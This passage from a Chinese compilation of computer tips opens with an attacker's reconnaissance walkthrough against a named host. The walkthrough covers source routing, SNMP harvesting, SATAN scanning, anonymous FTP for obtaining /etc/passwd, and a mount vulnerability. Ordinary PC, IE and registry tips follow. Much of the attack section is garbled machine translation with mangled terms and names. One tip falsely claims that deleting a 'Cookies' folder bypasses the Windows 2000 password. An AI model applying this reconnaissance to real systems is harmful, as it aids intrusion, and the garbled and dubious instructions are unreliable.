我需要知道semxa.com 是否允许IP 源路由及IP 转发。可以在传输层通过IP 转发向NEtWork
发出一个包尝试得到响应。但不幸运它的firewall 没那么差。捷径没有但还可以利用Kit
Vtivoy 的路由跟踪程序Rtracker(ftp://semxa.technotr.com/tools/)来完成,通过对loose 源路
由用-g 选项从源路由给目标路由发一个包如果能得到一个响应的话就算OK。获取是否允许
IP 源路由及IP 转发是因为IP 包分段本身不安全。如果说能通过Packet pry 看到这种分段的
happen,理念上可以截获连接同时再deceiving TCP 头利用这种分段得到
根的impersonation。我尝试了tcpdump 但无收获。前几天那位来自Gallo Mr rhinoceros 在这
里提到过可以在合适的时候"passed aggravate load begets of middle router fragments......"
(CITE),不知道他可否能将步骤变成文字与大家Share。
16、获取Simple network Management Protocol(SNMP)信息:
SNMP 是一个允许远程程序方便NetWork 管理的server,它是个简单的NetWork 管理协议,
是与TCP/IP NetWork 中像router、交换器、集线器(HUB)进行通讯的一系列标准。通过
SNMP 可以获取到host 与route 的信息。收集SNMP 信息得从SNMP 传输请求想起。一个
SNMP 请求包含一个Community name,它用于目标系统上的snmpd 守护程序认证访问请求,
而请求有两种,一种是SNMP GetRequest;另一种是SNMP SetRequest,在这里我不会假设
你已经掌握了关于SNMP 技术,因为We here of MOSES Dave Goldsmith 的那篇〈once The
attacked on entireness using SNMP〉比什么都详细,你需要去读一下(如果你还没看过的话)。
不过我
个人认为SNMP 的明天不会很长。
17、其它更多的信息:
事实上在获取信息的时候每个数据都是不应当放过的,因为一时的疏忽可能会使你失去机
会。了解目标主机中所有的信息,这对最后整理很有用。除了以上所说的之外还应获取更多
的(如果有时间的话)像可否进行Packet pry、NTP、relay chat、talk、systat、gopher、UUCP、
CGI、编译器信息等等。最近以来,UUCP 的安全问题一直在GOLD COAST 上讨论的比较
热闹,而我在一段时间内也很注意UUCP,但从上次Chameleon 的“UUCP--age-old UUCP of
safety problem”起,其可利用性也就随着“age-old”在我脑海沉没了。虽然如此,但也并不
意味着放弃(如果有的话)。
从上面开始到了现在也算是收集的大部分的信息,那么整理这些信息是很有必要的,这样看
起来清楚一点不至于有疏漏。一般情况下我在收集完结束之后会搞一个像下面的一样的表
118 电脑高手知识精华
电脑高手从fcbu.com开始
格:
host :www.semxa.com
port server:21ftp、22SSH、23telnet、25SMTP、117UUCP⋯⋯
——————————————————————————————
ftp server open os Digital UNX Version
bugs log:
⋯⋯⋯⋯⋯⋯
这样下来可以随手找到信息的。很方便。
前头所描述的是一般普通攻击手工简单收集和获取目标主机的信息的一种思路,之所以在表
现SATAN 中很大篇幅的说它,那是因为跟SATAN 的本身是很有关系的。所有的信息手工
收集起来需要很长时间也同样是一个巨大的工程。可能会花去你四到五个小时去做。而这些
工作换成SATAN 去做的话,仅仅在几分钟便可完
成,同时还会对那些已经植入代码的漏洞进行攻击尝试。如果说上述的信息都可用SATAN
来完成的话,那么就可以断定,用SATAN 扫描网络将是一个很危险的动作,这危险是相对
恶意破坏而言的。
SATAN 在扫描中很重视到目标系统中各种TCP and UDP 端口上比较活跃的进程。但这些又
取决于用户指定的扫描类型。在SATAN 中,它的类型根据网络状况存在着三种扫描程度,
这分别是:low-grade(轻度)、normal(标准)和grievous(重度)scan。而这三种程度又具
体表现为:low-grade(轻度)扫描:
这种状态下的扫描是从DNS、rpc、portmap 进行的。
DNS 扫描时利用nslookup(Unix 上一种交互式查询Internet 主机、server 名字的命令程序)
来收集有关目标主机的更多点信息,这些信息包括目标主机的MX 记录和授权nameserver。
rpc 扫描目标主机portmap 请求一张服务列表,而后对列表进行扫描查询:
bootparam、ypbind、selection-SVCnfs、rexd、arm、mountd、rusersd、
netinfobind 以及admind。
如果说portmap 的服务列表中显示有mountd,那么SATAN 就会进行showmount 扫描,首先
会要求目标的mountd 给出一个列表,列表中显示哪些文件系统输出和哪些主机被允许加载
它们。最后会要求目标mountd 列出实际加载文件系统的host 和被加载的文件系统。
showmount 是Unix 中一个消息查询的命令,它可以给出一台远程主机上的NFS 信息,比如
用$showmount -e 4.4.4.4。这样的扫描不做普通的TCP and UDP 扫描的,扫描范围比较小。
normal(标准)扫描:
标准扫描包含了轻度扫描的所有内容,同时增加了对fingerd、各种TCP 服务以及UDP 服务
的扫描。扫描时会根据结果和扫描规则库有选择的对rusers(这是个Unix 上消息查询的命
令,可以显示出一台远程机器上登陆用户列表)、bootparam 和yn 进行扫描。
finger 的查询无须再说了。
SATAN 随后会对TCP 进行扫描,以便得到目标端口上活跃的gopher、http、FTP、telnet、
SMTP、NNTP、UUCP 以及X 等服务。再者就是UDP 端口上的DNS 与Xdmcp 的扫描。如
果说查询时portmap 报告回来目标的rusersd 是可以用的,那么SATAN 就会请求rusersd 给
出都有哪些用户,他们是从哪个系统上登陆进入的等等。
rpc bootparam 服务可以让SATAN 获取NIS 的域名,如果SATAN 一旦获得了这个域名的话,
SATAN 就会开始启动一个up -chk 程序来尝试从NIS server 上获得passwd、byanme 映射。
现实中SATAN 标准扫描是比较常用的。因为很多机器到这里就已经可以达到驾驭它的目的
119 电脑高手知识精华
电脑高手从fcbu.com开始
了。serious(重度)扫描:
这次扫描包含了上述两种的全部内容。增加了对那些比较活跃的服务的更多一些的扫描。
TCP 的端口也从1 到了65535(但默认时是1 到9999),UDP 的端口则是1 到2050,32767
到33500。很显然,这需要时间和多点资源了。上面这三种扫描其实仅仅只是SATAN 扫描
的前个阶段,主要是为了收集目标机器的信息。
在SATAN 的规则扫描中包含了一些常见的安全漏洞的检查。但并不包含所有已知漏洞,这
需要你来自己增加。经常的更新自己的SATAN 漏洞库集对发现新漏洞是很重要的。通过创
建一个新的.satan 并将它放到bin/目录中就可以完成增加一个新的扫描了。
建立SATAN 也很简单,但却很麻烦。在SATAN 软件包里包含了大量的HTML 构造起来的
Web 页,这些Web 页是很重要的,因为很多漏洞的信息来自这些页面。上面简单的说了些
关于建立SATAN 的方式。在config/目录下编辑paths.pl and paths.sh 文件,实现你做需要的
文件放置位置;接着可以根据你自己的要求去编辑config/satan.cf,可以根据自己的需要考
虑给$only-attack-these and $dont-attack-these 增加一些
简单的实用的内容(这两个变量提供对SATAN 扫描主机时的控制);运行rcsonfig 脚本(应
当注意的是这个脚本是Perl5.00x and a Web 浏览器的增强脚本,如果rcsonfig 选择的Web 不
适合,那么编辑config/paths.pl 指向这个选择的浏览器,这时的Web 浏览器变量是
$MOSAIC);在satan-1.1.1/目录下执行make 指令;如果你想隐藏自己或者是需要一个代理
的话(因为这个时候会提示给你的)在SATAN 的文档中特别说明了不需要设置代理环境变
量或浏览器代理;以root 登录运行SATAN 脚本,如果没有给出命令行参数,脚本调用一个
小的Web server,也就是html.pl,再与之进行对话⋯⋯一切妥当之后SATAN 的主界面便会
出现。
由于SATAN 操作很简单,就如何使用它来描述可能有点prosiness。《:-)首先启动SATAN,
毫无疑问,启动它需要#。administrators 在使用SATAN 的候最好是将其配置成拒绝本地以
外的IP 来运行SATAN,但这也不完全可以防止。因为一般情况下使用IP 欺骗便可以饶过
这个环节。接着配置管理选项,对www.semxa.com 这单一的目标进行扫描必须将proximity
最大设置成0 并且关闭子网的扩展或者过早的编辑config/satan.cf,根据需求再利用
$only-attack-these 变量将扫描限制在单一之上。然后选择"Change the C-nfiguration File"项
save 修改。很多时候把限制放松到一个整的网段效果会好许多,但这取决于你是否有这个时
间和精力。
最后在"Target Selection"中植入目标地址,接着选择scan degree 启动扫描就over 了。后来需
要做的就是等待结果。当SATAN 的子线提示已经完成时,就可以在SATAN 的Data Gather Of
Screen 选
"View primary target results"来浏览结果。也可以在SATAN 的子目录results/s-ata-data 来看。
信息和弱点收集结束接着能做的就只有空洞的分析那些结果了。This is the job nerve-racking,
当然只是就我而言的。:-对于www.semxa.com,现在已经收集到了很多信息在我的表格中了,
“对号入座”是目前该做的事情了。在SATAN 收集到目标机器的OS 的时候,我抽了这个
空余时间到www.netsafety.com 收集关于那个OS 的所有漏洞的信息,有了它我就可以在
SATAN 的报告中标识出哪个可以用哪个该放弃。所以说经常留意最新的安全弱点报告是很
重要的。但目前应当做的还是需要第一个能登陆系统的用户和它的口令。
对于匿名可以进入的系统来说,这无疑是一个好的兆头。虽说匿名的FTP 本身并不是个漏
洞,但是它却可以使攻击者能获得这个系统的信息以及更多的包括内部SATAN 不能逾越的
漏洞,甚至可以因为管理员的低级配置而获得/etc/passwd 文件。
120 电脑高手知识精华
电脑高手从fcbu.com开始
目前在Internet 上,提供匿名服务的系统依然很多。我们花点时间来探讨一下这些吧(如果
你也有时间的话)。但匿名FTP 的未来我想应该不会很长远吧,毕竟它是一个潜在的安全隐
患。
从Unix 上设置匿名的FTP 服务路径:
$mkdir/home/ftp
$cd /home/ftp
$mkdir bin
$mkdir etc
$mkdir pub
$mkdir lib
$cp /bin/ls /home/ftpbin
$chmod 111 /home/ftp/bin/ls
接着需要创建只能被匿名FTP 用户使用的FTP 组,这个组没有其他成员的组,把这个新创
建的组所能使用的项加到/etc/group 文件里,再创建一个单独的
$mkdir /home/ftp/etc/group
FTP::50
建设匿名的FTP 用户名,方法是把该用户的项放在/etc/passwd 中,并创建一个为
/home/ftp/etc/passwd 文件,当然它只能包含该FTP 项。内容表现为:
FTP:*:23:32::no shell
接着需要做的就是把这个项设置成只读444:
$chmod 444/home/ftp/etc/passwd
$chmod 444/home/ftp/etc/group
以上这是一般的Unix 上匿名FTP 的配置。从上面的no shell 不难看到匿名的FTP 用户登陆
后是无法通过shell 对系统进行操作的。如果说出现可以通过shell 来操作系统或的匿名FTP
用户拥有合法的shell 的话,那这个管理员一定是个Zanily Gink。
而所谓的匿名用户获取/etc/passwd 那也是属于管理员配置上的低级错误。匿名FTP 的
/home/ftp/etc 目录里包含了passwd 和group 文件,这几个文件允许匿名用户使用ls 来显示它
们名称,但不是UID。至于passwd 文件的密码域则是不可用的。但如果说管理员不慎把
/etc/passwd 和/etc/group 文件copy 到了/home/ftp/etc 目录下,那么攻击者就该偷笑了。还有
的危险就是telnet to ftp 21 如果允许执行SITE CHMOD and
SITE EXEC、/home 的所有者是匿名FTP 的用户,那么随便就可把权限设置成777 或者更多
的进行修改等等等等。可semxa 却没有匿名FTP 服务,所以上面的话只是我想到了才说的。
haha⋯⋯:-x *就SATAN 而言。www.semxa.com 的实际漏洞并不是很多,但却有一个绝对够
级别的漏洞——mount 的漏洞。这是一个很老的漏洞了,据说可以延伸到VAX 年代,Sun
的描述是“如果两个连续的mount -d -s 命令在几秒内发送给机器,则请求被实现⋯⋯”。而
对缓冲区溢出来说,一直是受到关注的。以缓冲区溢出为类型的安全漏洞是最为常见。但要
利用缓冲区溢出上的漏洞那么你就得熟悉汇编语言、c and Unix、Windows 甚至是Linux 以
及更多的系统。否则你只能看着别人去模仿,这是很不自然也很不方便的。当然了,最重要
的还是你得知道溢出的是什么缓冲区。Mixter95 年曾经写过一篇初级的关于缓冲区溢出的利
用的文章《Writing buffer overflow exploits - a tutorial for beginners》,我在这里纯粹是起一个
“广而告之”的作用。看这篇文章你可以到http://semxa.kstar.com/HANLU/buffer95.txt 看到
全部。*我提倡把扫描的结果建立成表格的形式,是因为这样可以使你更好与漏洞进行匹配,
121 电脑高手知识精华
电脑高手从fcbu.com开始
这是很值得的。熟悉英文的用户在建立了表格之后可以去BUGTRAQ 找,最重要的在这里
你甚至还可以相匹配的攻击代码。而厌烦English 的用户则可以去www.105.com.cn,这是一
个很有价值的站点,在这里可以找到97 年至今的各个系统的安全漏洞,当然大部分也是带
有代码的。怎么利用所收集到的漏洞进行攻击暂时不是这个文章所讨论的问题。可事实上讨
论漏洞如果利用却一直是很得到重视的,很多朋友都这么以为。可我认为这是后话,只是觉
得一个真正的技术上的成功的背后大多是有着坚韧而不舍弃、勇往追求的执着精神努力而来
的,绝不是从天上掉下来或者是从娘胎里带出来的“天生的天才”。如果说一个潜在的漏洞
所能给你得到的是一个最高权限的话,那么没有任何漏洞的情况下呢?当我们还在尝试
Modem 的拨号入侵甚至是再深奥一点的时候,美国人却正在进行着DCC attack,不由得发
现世界如此之大,可我们太肤浅了⋯⋯
请相信一步难上青天,需要点点滴滴⋯⋯
忘记密码也能登录Win2000
用户不小心忘记了密码,造成无法登录Windows2000 时,只需用启动盘启动电脑或引
导进入另一操作系统(如电脑安装有Win98 与Win2000 双系统),找到文件夹“X:Documents
and SettingsAdministrator”(X为Windows2000 所在磁盘的盘符),将此文件夹下的 “Cookies”
文件夹删除,然后重新启动电脑,即可以空密码快速登录Windows2000。为安全起见,用户
可重新设置各用户密码。
如何浏览 *.pdf、*.wdl(*.wdf) 等类型的文件?
在windows 环境中,经常得到一些以.pdf、.wdl 或.wdf 为扩展名的文件,它们是一类传递
图文信息的特殊格式的文件,目前要用对应的阅读器打开才能阅读。其中 *.pdf 文件格式
为 adobe 公司创制,要用该公司的 Acrobat Reader 软件打开观看;这种文件的建立要用到
Adobe 公司的特殊的Acrobat 编辑器。另一种*.wdl(*.wdf) 的文件要用一个叫 DyanDoc Free
Reader 的阅读器来打开阅读,微软公司的Visual Studio 6.0 所附带的各类参考手册就采用了
这种文件格式。
标准输入法(智能 ABC 输入法)的几条技巧:
(1)简拼单词表:简单地键入该字母,按回车,就可以输入对应的汉字。对应关系是:
122 电脑高手知识精华
电脑高手从fcbu.com开始
d=的 l=了 s=是 z=在 h=和 j=就 w=我 t=他 b=不 g=个 p=批;
n=年 r=日 i=一 I=壹 y=有 x=小 f=发 zh=这 sh=上 ch=出
(2)使用隔音符号:输入像“西安”“然而”这样的词,用隔音符号将其分隔,输成:“xi';an ”
和“ran';er”;
(3)中文标点的输入:比较简单,但注意书名号在“〈”和“〉”键上是嵌套的,即第一次按
“〈”键输入的是“《”,再按“〈”键输入的是“〈”;省略号“⋯⋯”的输入热键是 Shift+6;
(4)快速输入成语和词组:用词语的拼音首字母,可以快速输入成语和词组。如:jsj-计算机,
jyqj-精益求精;
(5)使用符号“[”“]”来以词定字:
如键入“cmjb”可以输入“草木皆兵”,而键入“cmjb”后再敲“[”键可输入“草”字,键
入“cmjb”后再敲“]”键可输入“兵”字;
(6)快速输入常用数量词:以前导字符“i”或“ I”加对应的字母,可以快速输入数量词。
ig=个 is=十 Is=拾 ib=百 Ib=佰 iq=千 Iq=仟 iw=万 ie=亿 iz=兆 id=第
in=年 iy=月 ir=日 it=吨 ik=克 is=十 if=分 il=里 im=米 ij=斤 io=度
ip=磅 iu=微 ii=毫 ia=秒 ic=厘 ix=升;
(7)“音码+形码”快速输入单字:智能ABC 输入法并不只是纯粹的拼音码,结合其形码可
以快速定位汉字。其形码编码如下:1-横 2-竖 3-撇 4-捺 5-折 6-竖弯钩 7-十部 8-口部。
如果要输入“事”字,可键入“shi1”,则“事”就会出现在输入栏的上部,很容易地就会
找到它。再比如“zai13”可直接输入“在”字,“zai12”可直接输入“再”字。
(8)在英文标点/汉字标点之间切换的快捷键:“Ctrl+ .”。
(9)各种符号的输入:以前导字符“v”加 1,2,3,⋯,可以快速输入各种符号,如 v1 可输
入标点符号,v8 可输入汉语拼音的带声调的字母,v9 可输入制表符,等等。
网卡
在“网络时代”给机器安装网卡是成为电脑高手必需的基本技能。像许多其它硬件一样,安
装网卡分为硬件安装和软件安装两部分。
(1)了解网卡:是 IDE 接口还是 PCI 接口? 网卡是否支持 PnP? 是 10M 还是 10M/100M
自适应网卡? 带几种网线接口(BNC,RJ45)? 网卡的品牌? 网卡的说明书和驱动程序盘是否
完好?
(2)将网卡安装到微机主板的合适的(IDE、PCI)插槽中;
(3)运行网卡驱动程序盘上的网卡诊断程序测试网卡;记住网卡的 IO 端口号和 INT 中断
号;
(4)如果网卡支持 PnP(即插即用),那么 Windows 一般会检测到该设备,并要求安装网卡的
驱动程序。如果Windows 不支持该网卡,则必须安装驱动盘上的驱动程序。将驱动盘插入
软驱,指向对应的目录,驱动程序会被 Windows 找到,并拷入Windwos 的目录下;
如果网卡不支持 PnP,或 PnP 特性被我们设置为“关闭”(Disable),那么我们可以手动添
加该设备,并设置其 IO 端口号和 INT 中断号;
(5)如果网卡安装正确,则我们在“网络邻居”里应该能看见自己的机器(这个过程有时较长,
可以多按几下 F5 键,或在“开始/查找/计算机”里查找这台机器)。
123 电脑高手知识精华
电脑高手从fcbu.com开始
(6)如果是在 DOS 下安装网卡,则记住其 IO 端口号和 INT 中断号对正确安装网卡更有
用。
什么是“防火墙”?
防火墙是一个位于内部网络与 Internet 之间的网络安全系统,是按照一定的安全策略建立
起来的硬件和(或)软件的有机组成体,以防止黑客的攻击,保护内部网络的安全运行。防火
墙可以被安全在一个单独的路由器中,用来过滤不想要的信息包,也可以被安装在路由器和
主机中,发挥更大的网络安全保护作用。防火墙被广泛用来让用户在一个安全屏障后接入互
联网,还被用来把一家企业的公共网络服务器和企业内部网络隔开。另外,防火墙还可以被
用来保护企业内部网络某一个部分的安全。例如,一个研究或者会计子网可能很容易受到来
自企业内部网络里面的窥探
维修电脑菜鸟招数
1、如果鼠标时动时停,请把台灯关掉;
2、以下东西坏了可以修:显示器、音箱、鼠标、主板;其他东西坏了就换;
3、Windows 的显示系统出问题时,请打开:系统属性-性能-图形,把“硬件加速”降低一
些试试;
4、Windows 不能启动时,往往可以在 C:BOOTLOG.TXT 中找到答案;
5、如果 Windows 经常出现蓝屏故障,多半是内存或超频的原因;
6、电脑不自检时,先看看是不是 26 日;不是的话看看电源线有没有插紧;RESET 键有没
有弹起;
7、黑屏时看看显示器有没有打开电源、数据线插没插,显示器的对比度是否被调到最低;
音箱没声音时也“如法炮制”;
8、键盘上的某一个键是不是被压下不动了? 这样经常会被误认为黑客;
9、机箱尽量接地;
10、如果机器老是自动重启,请把空调、电炉关掉;
11、主板上的灰尘会导致各种各样的“软”故障;
12、上网的时候,把电话线路上的“防盗报警器”拔掉,否则你可能永远拨不通;
13、升级 BIOS 时,一定要在硬盘升级。否则如果你开着空调,你就会变成陈盈豪第 2;
14、硬盘灯常亮,但能正常使用时,也许是把硬盘跳成从盘了;
15、用 Ghost 重装系统是解决问题最快的方法。
补充:以上规则不一定总是有效!
如何在基于 Windows2000 的局域网中发送消息?
在命令提示符下,用以下格式发送消息: net send <用户名或 IP 地址> <信息>
如果是给一个组的成员发送消息,则: net send/domain: <组名> <消息>
什么是 DirectX?
124 电脑高手知识精华
电脑高手从fcbu.com开始
在 Windows 操作系统的体系构架中,在内核与硬件之间有一层抽象层,专门对硬件进行屏
蔽抽象,所以用户不再被允许对硬件进行直接访问。这样做以后,大大地提高了操作系统的
抗破坏性和抗干扰性,但这样以来,使硬件操作的效率大打折扣,许多新硬件的新特性无法
直接使用,这对多媒体和游戏的发展显然是一种障碍。DirectX 是微软公司提供的一套优秀
的应用程序编程接口(APIs),用于联系应用程序和硬件自身,它对发展 Windows 平台下的
多媒体应用程序和电脑游戏起到了关键的作用。DirectX 组件包括:DirectDraw、DirectSound、
DirectPlay、Direct3D、DirectInput、DirectSetup、AutoPlay 等。
总之,DirectX 的主要好处有两个:为软件开发者提供与硬件的无关性;为硬件开发提供策
略。
电脑的整体速度由哪个部件决定,CPU 吗?
电脑的速度是一个综合指标,不是那一个部件所能决定的。不是 CPU 的主频越电脑的速度
就越高。电脑的速度主要由 CPU 主频、硬盘速度、内存条存取速度、内存和显存的大小等
因素决定,无论那一个成为“瓶颈”,都会使机器的整体速度下降。所以一些高档服务器,
其每个部件都经过了严格的挑选和测试,以保证机器的整体速度。
怎样清除忘记的 CMOS 口令?
(1)快速短接主版上 CMOS 供电电池附近的“Clear CMOS”跳线;
(2)如果机器能启动进入 DOS 或 Windows,可以试按照以下步骤清除 CMOS:
C:>DEBUG
-o 70 11
-o 71 ff
-q
然后,启动机器。
IDE 硬盘和光驱的合理安装:
现在一般的主版都有两个 IDE 接口,第一硬盘(引导机器启动)应安装在 IDE1 口上,并将主/
辅(Master/Slave)跳线跳在“Master”上。光驱尽量不与硬盘接在同一个 IDE 口上,故一般
在 IDE2 口上安装光驱。如果IDE2 口上只接有光驱,那么其主/辅(Master/Slave) 跳线可任
意设置;如果还有硬盘或光驱,则它们的跳线设置必须不同。
调整 COMS 设置,加快机器启动速度:
125 电脑高手知识精华
电脑高手从fcbu.com开始
计算机在启动的时候会对电脑做一系列的检测,而这些检测并不总是必须的,你可以在
CMOS 中进行优化设置,加快电脑启动速度。方法如下:开机后按 Del 键进入 CMOS 设
置,将“Quick Boot”设为 Enable,这样可使机器启动时不检测 1MB 以上的内存。再将硬
盘的参数用 CMOS 测出,不要使用 AUTO,其他没有接硬盘的 IDE 通道都设置成 NONE,
这样启动的时候就不会去检测每个端口的设备了。如果你不经常用软盘启动,还可以将启动
顺序改成 C Only,这样就可以直接从硬盘启动,而不用先去读软驱或者其他设备然后再到
转到硬盘启动了。如果你不用 USB 设备等硬件,把它们也给关上
★问:我的Windows XP 系统中安装了MSN Explorer,以前开始菜单中是显示IE 图标的,
现在却显示MSN Explorer 图标,不知如何改回去?答:右击“开始”菜单,选择“属性”,
选择第一个选项,再单击“自定义”打开“自定义”窗口,然后在“常规”标签中的“在开
始菜单上显示”区中的 “Internet”选择为“Internet Explorer”即可。★问:以前使用QQ
与朋友联系,后来我改使用MSN Messenger 与好友进行联系了,但是最近遇到一个麻烦事,
那就是在MSN Messenger 的登录窗口中除了我自己的登录账号外同时还有好几个无用的登
录账号,也没有清除按钮,不知如何删除这些无用的登录账号?答:要想清除MSN Messenger
登录窗口中无用的账户,可以按下述方法来操作:第一步:单击“开始→控制面板”并在打
开的“控制面板”窗口中双击“用户账户”图标。第二步:在打开的“用户账户”窗口中选
择你当前的用户,并在窗口中单击“管理我的网络密码”项,然后将不需要的登录账户的
E-mail 地址删除即可。★问:以前我给IE 安装了如“3721 助手”、“易我秀”等几个插件,
现在我将这些插件删除了,但是在IE 的工具栏中还留有其身影,单击将会得到“无法找到
与之相关联的程序”提示,不知如何将它们从工具栏中删除?答:要删除IE 工具栏中不需
要的图标可以这样来操作:单击IE 工具栏上的“>>”小按钮,在展开的菜单中选择“自定
义”项,在打开的窗口“当前工具栏按钮” 列表中选择你不需要的项目,然后单击“删除”
按钮即可。★问:最近不知是怎么设置的原因导致每次只要单击文件夹即将其打开,我想还
原到原来的双击打开文件夹,不知如何设置?答:解决方法:单击资源管理器窗口中的“工
具→文件夹选项”,在打开的“文件夹选项”窗口中选择“常规”标签,在“打开项目的方
式”区中选择“通过双击打开项目”项,最后“应用→确定”即可。★问:我准备用记事本
创建一个批处理文件“a.bat”,最后我要将记事本文件的扩展名“.txt”改为“.bat”,但
是改过之后文件名成了“a.bat.txt”,还是记事本文件,不知是什么原因?答:这可能是
因为你将“文件和文件夹”选项设置为“隐藏已知文件的扩展名”了,这样设置之后,“.txt”
就被隐藏起来,你所添加的“.bat”就自动成了文件名的一部分而不是扩展名了,解决方法
如下:单击资源管理器窗口中的“工具→文件夹选项”,再选择“查看”标签,取消选择列
表中的“隐藏已知文件的扩展名”,最后再将“.txt”改为“.bat”即可。★问:一个朋友用
过我的电脑后出现了这样的一件怪事:每当我离开一会,我的电脑就会自动进入休眠,不知
是什么原因?是不是中毒了?答:不是中毒,可能是你朋友为了帮你节省电能而设置自动休
眠功能了,如果你不想这样,可以按下述方法来设置解决它:单击“开始→控制面板”,双
击“电源选项”图标,在打开的“电源选项”窗口中选择“电源使用方案”标签,然后将“系
统休眠”项设置为“从不”即可。★问:我的系统是Windows XP,以前启动系统在未登录
前有相应的“关机”选项让我们正确的关机,但是现在登录之前根本就找不到“关机”项,
如果在未登录之前想关机必须得强行关机,不知如何解决?答:可以通过组策略来解决:单
击“开始→运行”,在打开的“运行”对话框中输入“gpedit.msc”并回车,打开“组策略”
窗口,然后在左侧窗口中展开“计算机配置→Windows 设置→安全设置→本地策略→安全选
126 电脑高手知识精华
电脑高手从fcbu.com开始
项”,然后在右侧窗口中找到“关机:允许在未登录前关机”项并双击之,在打开的窗口中
选择“已启用”并单击“应用→确定”按钮即可
使用过IE 的朋友都知道,在IE 地址栏中输入网站网址就可以访问各种网站,其实在IE 中
地址栏还具有其他的一些使用功能,了解掌握这些功能的使用方法可以为我们使用电脑带来
极大的方便。现将IE 地址栏的一些使用方法介绍给大家,希望能对你有所帮助。
1、快速打开“我的电脑”
在IE 地址栏中输入“我的电脑”,回车后即可打开“我的电脑”。
[编者注:在一部分以IE 为内核的浏览器中,这种方法可能会失效,如Tencent Explorer
等等。]
2、快速发送电子邮件 在IE 地址栏中输入“mailt 电子邮件地址”,回车后就可以
立即启动系统默认的电子邮件程序来进行电子邮件的发送工作。
3、快速进入DOS 运行方式
在IE 地址栏中输入“c:command.com”,回车后即可进入DOS 运行方式。
4、快速设置“控制面板”
在IE 地址栏中输入“控制面板”,回车后即可进入“控制面板”设置窗口,用户可对所
有的控制面板项目进行设置。
5、快速打开文件夹
在IE 地址栏中输入文件夹路径即可打开此文件夹,例如在地址栏中输入“e:tool”,即
可将E 盘下“tool”文件夹下的子文件夹及文件显示在IE 浏览窗口中供用户使用。
6、快速查看网页更新情况
当我们浏览一些网站时,希望能知道网页最近一次更新情况,这时只要在地址栏中输入
如下内容“javascript:alert(document.lastModified)”,IE 就会显示出你所打开网页的最近一次
更新日期及时间,让你清楚地知道这个站长是懒惰还是勤快。
突破网页文字无法复制
在有些网页上,你按住鼠标左键不停地拖动,但无论如何也无法选中需要的文字,这时你会
怎么办呢?按Ctrl+A 键将网页全部选中,“复制”,然后从中选取需要的文字即可。另外,
点击IE 的“工具/Internet 选项”菜单,进入“安全”标签页,选择“自定义级别”,将所有
脚本全部禁用,然后按F5 键刷新网页,这时你就会发现那些无法选取的文字可以选取了。
注意:在采集到了自己需要的内容后,记得给脚本解禁,否则会影响到我们浏览网页。
如果你浏览时需要经常修改IE 设置,那我建议你使用NetCaptor 浏览器,它将“Internet 属
性”上的一些常用设置转到菜单栏或工具栏上了,如图,这样,你只要点击它的“安全”菜
单或“安全”按钮,根据需要选择禁用、启用、提示就可以了,免去了频繁打开“Internet
属性”对话框的麻烦。
127 电脑高手知识精华
电脑高手从fcbu.com开始
IE 自动匹配出错解决二法
Windows XP 简体中文版自带的IE 6.0 按Ctrl + Enter 不能快速输入网址:www.XXX.com,
关于这种自动匹配的现象,有二种方法可以解决。
1、请到“windowssysytem32”找到 browselc.dll 文件,先复制一份,然后用eXeScope
6.0 打开,来到“ resource=>string”把809 字符串中的co.cn 修改成 com。直接覆盖旧
browselc.dll 件系统不允许,因为 browselc.dll 在运行。如果有双系统,请进入另外一个系
统,覆盖文件;如果没有双系统,把硬盘接到其它的电脑上,覆盖。
2、可打开注册表,展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet
Explorer MainUrlTemplate 分支,然后就可以在UrlTemplate 分支下看到6 个分别名为“1”、
“2”,⋯⋯“6”字符串值,将键值“www.%s.co.com”设置为“www.%s.com”即可,搞定!
个性化你的IE 浏览器注册表篇
由于下面的工作我们要经常用到“注册表编辑器”,所 以在这里我先简单的介绍一下它。
点击“开始→运行”,输 入“Regedit”后按回车键即可打开注册表编辑器,是不是觉 得和
“资源管理器”有点像?其实操作方法也差不多,如图1 所示,选中任意一个键后便会在右
边的窗口中出现相 应的子键,此时点击鼠标右键可以执行重命名、新建子键、 查找和删除
等命令。 1.个性化标题栏
看惯了别人的标题栏里的各种各样的精彩标题,自己 是不是也想“个性”一把?这很
简单,只需在注册表中添加一些东东就可以了。打开注册表编辑器,找到[HKEY_
CURRENT_USERSoftwareMicrosoftInternet ExplorerMain],在右侧窗口中双击一个名为
“Window Title”的字串值(如没有,可自行创建),在“编辑字符串”中输入你喜欢的句 子,
个性的标题栏就为你打造好了。重新启动IE 浏览器看看吧! 个性化 不知你是否
注意到了IE 浏览器右上角的那个小图标 (LOGO),一般IE 浏览器默认的LOGO 跟资源管
理器中的LOGO 是一样的,都是乏味的“地球绕窗口”,当你畅游网 络时,它就会在那里
转个不停,其实我们也可将它改为自己喜欢的动画。首先准备两张38*38 像素大小、256 色
的 BMP 图片。然后打开注册表编辑器, 找到[HKEY_CURRENT_ USER
SoftwareMicrosoftInternet ExplorerToolbar] , 在右侧窗口中新建两个分别为“ SmBr
-andBitmap”和“BrandBitmap”的字符串值,(前者是连接网络后的 LOGO,后者是未连接
时的LOGO)分别双击它们,在对话框中留下图片 的路径和名称,这样你就不会在上网时
看那“地球绕窗口”而感到头晕了! 3.个性化工具栏背景
大概IE 浏览器默认的工具栏背景已经让你厌倦,为什 么不让自己感受点新鲜的氛围
呢?首先准备一幅可以作为背景的BMP 格式图片,图片的尺寸为800*140,建议颜色 不要
128 电脑高手知识精华
电脑高手从fcbu.com开始
太深,否则会影响工具栏中文字的显示,256 色即可。 然后打开注册表编辑器,找到
[HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerToolbar],在右侧窗口空白处
点击右键新建一个名为“BackBitmap”的“字符串值”, 接着双击该值,在弹出的窗口中输
入刚才保存的图片路径及其名称,关闭注册表编辑器,重启IE 浏览器看一看,呵 呵,再也
不是那个单调的背景了!做了这些改动后,资源管理器的工具栏背景和IE 工具栏的背景是
一样的,如果你 不喜欢这样,可以重新修改IE 浏览器的工具栏背景:在刚才新建的
“BackBitmap”下面再新建一个名为“Back- BitmapIE5”(要填写你使用IE 浏览器的版本号)
的字符串 值,双击并将其值改为另一幅BMP 背景图片的保存路径和名称。经过一番修改
后,保证让你的IE 浏览器窗口与众不 同。 倘若你自己不想动手制作BMP 图片,还
可以到http:// www.hotbar.com 和http://easeband.163.com/show.php 处下 载,那里有很多漂亮
的背景图片供你选择,这些图片不但不会影响正常使用,还能给你带来意想不到的视觉享受。
(在选择图片时要注意与工具栏字体颜色有所区别,否则会 影响工具栏中字体的显示,别
连自己都看不清了 4.把应用程序请进工具栏
“时间就是生命”,相信大部分的朋友都喜欢快速的感 觉。当你某日浏览网页时,突然
